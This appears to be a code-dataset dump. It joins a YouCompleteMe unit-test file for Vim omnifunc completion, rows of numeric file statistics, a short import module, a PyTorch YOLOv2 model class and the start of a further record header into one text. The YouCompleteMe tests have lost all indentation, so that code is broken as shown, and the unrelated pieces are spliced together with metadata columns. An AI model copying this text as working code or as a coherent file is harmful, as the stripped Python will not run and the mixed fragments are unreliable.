# Copyright (C) 2016-2018 YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, contains, empty, has_entries
from ycm.tests.test_utils import ( MockVimBuffers, MockVimModule, ToBytesOnPY2,
VimBuffer )
MockVimModule()
from ycm import vimsupport
from ycm.tests import YouCompleteMeInstance
FILETYPE = 'ycmtest'
TRIGGERS = {
'ycmtest': [ '.' ]
}
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 5 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ListFilter_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 5 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ListFilter_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
# Actual result is that the results are not filtered, as we expect the
# omnifunc or vim itself to do this filtering.
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_UseFindStart_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
# Actual result is that the results are not filtered, as we expect the
# omnifunc or vim itself to do this filtering.
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_UseFindStart_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
# There are no results because the query 'test.t' doesn't match any
# candidate (and cache_omnifunc=1, so we FilterAndSortCandidates).
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_Object_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return { 'words': [ 'a', 'b', 'CDtEF' ] }
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ 'CDtEF' ],
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectList_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': contains( {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ObjectList_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
# We don't filter the result - we expect the omnifunc to do that
# based on the query we supplied (Note: that means no fuzzy matching!).
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ {
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
}, {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectListObject_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return { 'words': [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
] }
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ObjectListObject_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return { 'words': [
{
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
},
{
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
}
] }
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.tt' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 7 ) ):
ycm.SendCompletionRequest()
# No FilterAndSortCandidates for cache_omnifunc=0 (we expect the omnifunc
# to do the filtering?)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ {
'word': 'a',
'abbr': 'ABBR',
'menu': 'MENU',
'info': 'INFO',
'kind': 'K'
}, {
'word': 'test',
'abbr': 'ABBRTEST',
'menu': 'MENUTEST',
'info': 'INFOTEST',
'kind': 'T'
} ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 12 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ 'å_unicode_identifier',
'πππππππ yummy πie',
'†est' ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 12 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ '†est',
'å_unicode_identifier',
'πππππππ yummy πie' ] ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_List_Filter_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ '†est', 'å_unicode_identifier', 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ 'πππππππ yummy πie' ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_List_Filter_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [ 'πππππππ yummy πie' ]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'πππππππ yummy πie' ] ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectList_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return [
{
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
},
{
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}
]
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.ππ' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 17 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': [ {
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
} ],
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_Cache_ObjectListObject_Unicode_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 12
return {
'words': [
{
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
},
{
'word': 'π†´ß†π',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
},
{
'word': 'test',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}
]
}
current_buffer = VimBuffer( 'buffer',
contents = [ '†åsty_π.t' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 13 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': contains( {
'word': 'test',
'abbr': 'ÅııÂʉÍÊ',
'menu': '˜‰ˆËʉÍÊ',
'info': 'ÈˆÏØÊ‰ÍÊ',
'kind': 'Ê'
}, {
'word': 'ålpha∫et',
'abbr': 'å∫∫®',
'menu': 'µ´~¨á',
'info': '^~fo',
'kind': '˚'
} ),
'completion_start_column': 13
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_RestoreCursorPositionAfterOmnifuncCall_test(
ycm ):
# This omnifunc moves the cursor to the test definition like
# ccomplete#Complete would.
def Omnifunc( findstart, base ):
vimsupport.SetCurrentLineAndColumn( 0, 0 )
if findstart:
return 5
return [ 'length' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'String test',
'',
'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 3, 5 ) ):
ycm.SendCompletionRequest()
assert_that(
vimsupport.CurrentLineAndColumn(),
contains( 2, 5 )
)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'length' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_MoveCursorPositionAtStartColumn_test( ycm ):
# This omnifunc relies on the cursor being moved at the start column when
# called the second time like LanguageClient#complete from the
# LanguageClient-neovim plugin.
def Omnifunc( findstart, base ):
if findstart:
return 5
if vimsupport.CurrentColumn() == 5:
return [ 'length' ]
return []
current_buffer = VimBuffer( 'buffer',
contents = [ 'String test',
'',
'test.le' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 3, 7 ) ):
ycm.SendCompletionRequest()
assert_that(
vimsupport.CurrentLineAndColumn(),
contains( 2, 7 )
)
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'length' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 1 } )
def StartColumnCompliance( ycm,
omnifunc_start_column,
ycm_completions,
ycm_start_column ):
def Omnifunc( findstart, base ):
if findstart:
return omnifunc_start_column
return [ 'foo' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'fo' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 2 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( ycm_completions ),
'completion_start_column': ycm_start_column
} )
)
def OmniCompleter_GetCompletions_StartColumnCompliance_test():
yield StartColumnCompliance, -4, [ 'foo' ], 3
yield StartColumnCompliance, -3, [], 1
yield StartColumnCompliance, -2, [], 1
yield StartColumnCompliance, -1, [ 'foo' ], 3
yield StartColumnCompliance, 0, [ 'foo' ], 1
yield StartColumnCompliance, 1, [ 'foo' ], 2
yield StartColumnCompliance, 2, [ 'foo' ], 3
yield StartColumnCompliance, 3, [ 'foo' ], 3
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_NoSemanticTrigger_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'test' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'te' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 3 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( { 'g:ycm_cache_omnifunc': 0,
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_NoCache_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 0
return [ 'test' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'te' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 3 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'test' ] ),
'completion_start_column': 1
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { FILETYPE: 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_FiletypeDisabled_SemanticTrigger_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { '*': 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_AllFiletypesDisabled_SemanticTrigger_test(
ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest()
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': empty(),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { FILETYPE: 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_FiletypeDisabled_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
@YouCompleteMeInstance( {
'g:ycm_cache_omnifunc': 0,
'g:ycm_filetype_specific_completion_to_disable': { '*': 1 },
'g:ycm_semantic_triggers': TRIGGERS } )
def OmniCompleter_GetCompletions_AllFiletypesDisabled_ForceSemantic_test( ycm ):
def Omnifunc( findstart, base ):
if findstart:
return 5
return [ 'a', 'b', 'cdef' ]
current_buffer = VimBuffer( 'buffer',
contents = [ 'test.' ],
filetype = FILETYPE,
omnifunc = Omnifunc )
with MockVimBuffers( [ current_buffer ], [ current_buffer ], ( 1, 6 ) ):
ycm.SendCompletionRequest( force_semantic = True )
assert_that(
ycm.GetCompletionResponse(),
has_entries( {
'completions': ToBytesOnPY2( [ 'a', 'b', 'cdef' ] ),
'completion_start_column': 6
} )
)
| 30.853881 | 80 | 0.542992 | 2,407 | 27,028 | 5.929788 | 0.107187 | 0.071043 | 0.045541 | 0.054649 | 0.86513 | 0.850277 | 0.840818 | 0.837946 | 0.816507 | 0.815876 | 0 | 0.011243 | 0.338538 | 27,028 | 875 | 81 | 30.889143 | 0.783421 | 0.059975 | 0 | 0.799451 | 0 | 0 | 0.154874 | 0.053333 | 0 | 0 | 0 | 0 | 0.039835 | 1 | 0.072802 | false | 0 | 0.012363 | 0 | 0.157967 | 0.001374 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86e1078769159b64611b6ae3e06953d4ef503fa3 | 105 | py | Python | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null | workon/flow.py | dalou/django-workon | ef63c0a81c00ef560ed693e435cf3825f5170126 | [
"BSD-3-Clause"
] | null | null | null |
from workon.contrib.flow.pipe import send
from workon.contrib.flow.signals import flow_user_disconnected | 35 | 62 | 0.866667 | 16 | 105 | 5.5625 | 0.625 | 0.224719 | 0.382022 | 0.47191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07619 | 105 | 3 | 62 | 35 | 0.917526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
86e9d8e9747a45b187abf687dee60ffb6a938577 | 3,849 | py | Python | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | models/model.py | ivanwhaf/yolov2-pytorch | 93770f0a8d25258fd26fee503e05cea72c434cad | [
"MIT"
] | null | null | null | from torch import nn
class YOLOv2(nn.Module):
"""YOLOv2 model structure
"""
def __init__(self, S, num_anchors, num_classes):
super(YOLOv2, self).__init__()
self.S = S
self.num_anchors = num_anchors
self.num_classes = num_classes
# conv part
self.conv_layers = nn.Sequential(
# conv1
nn.Conv2d(3, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv2
nn.Conv2d(32, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv3
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(128, 64, 1),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(64, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv4
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 128, 1),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(128, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv5
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 256, 1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 256, 1),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(256, 512, 3, padding=1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.MaxPool2d(2, stride=2),
# conv6
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 512, 1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 512, 1),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(512, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
# detection
nn.Conv2d(1024, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, 1024, 3, padding=1),
nn.BatchNorm2d(1024),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(1024, self.num_anchors * (5 + self.num_classes), 1),
# nn.Conv2d(1024, self.num_anchors * 5 + self.num_classes, 1),
nn.BatchNorm2d(self.num_anchors * (5 + self.num_classes)),
# nn.BatchNorm2d(self.num_anchors * 5 + self.num_classes),
# nn.LeakyReLU(0.1, inplace=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.conv_layers(x)
# print(out.size())
out = out.view(out.size()[0], -1)
# print(out.size())
# out = out.reshape(-1, self.S, self.S, self.num_anchors * 5 + self.num_classes)
out = out.reshape(-1, self.S, self.S, self.num_anchors, 5 + self.num_classes)
return out
| 34.675676 | 88 | 0.510262 | 485 | 3,849 | 3.991753 | 0.115464 | 0.090909 | 0.15186 | 0.141012 | 0.831612 | 0.80062 | 0.80062 | 0.788223 | 0.788223 | 0.788223 | 0 | 0.137917 | 0.346324 | 3,849 | 110 | 89 | 34.990909 | 0.631558 | 0.090933 | 0 | 0.731707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.012195 | 0 | 0.060976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86ff4a4db5d86567e5358bc3ab8e8708410011fe | 17,764 | py | Python | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
